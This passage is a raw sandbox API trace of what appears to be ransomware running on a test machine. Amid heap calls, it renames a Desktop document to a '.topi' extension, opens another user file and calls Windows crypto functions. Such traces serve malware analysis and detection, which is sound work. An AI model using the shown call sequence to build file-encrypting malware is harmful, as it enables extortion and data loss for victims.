HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9018 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9000 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.422] GetCurrentThreadId () returned 0x8c4 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1700 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.422] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.422] GetCurrentThreadId () returned 0x8c4 [0094.422] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\edcuZL9YV.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\edcuzl9yv.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\edcuZL9YV.odt.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\edcuzl9yv.odt.topi")) returned 1 [0094.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.425] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.426] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa20b7dc0, ftCreationTime.dwHighDateTime=0x1d5b997, ftLastAccessTime.dwLowDateTime=0xce02fd80, ftLastAccessTime.dwHighDateTime=0x1d5bd30, ftLastWriteTime.dwLowDateTime=0xce02fd80, ftLastWriteTime.dwHighDateTime=0x1d5bd30, nFileSizeHigh=0x0, nFileSizeLow=0xb666, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fgRRfm56VFVs.avi", cAlternateFileName="FGRRFM~1.AVI")) returned 1 [0094.427] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fgRRfm56VFVs.avi") returned=".avi" [0094.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fgRRfm56VFVs.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgrrfm56vfvs.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.427] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=46694) returned 1 [0094.427] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.430] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.430] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.432] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.433] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.433] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.433] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.433] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.433] GetLastError () returned 0x0 [0094.433] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.433] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.433] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.433] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.433] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.434] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.434] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb670) returned 0x99f52d8 [0094.434] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.434] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3970 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3928 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.435] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9030 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9018 [0094.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.436] GetCurrentThreadId () returned 0x8c4 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1790 [0094.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.437] GetCurrentThreadId () returned 0x8c4 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9048 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, 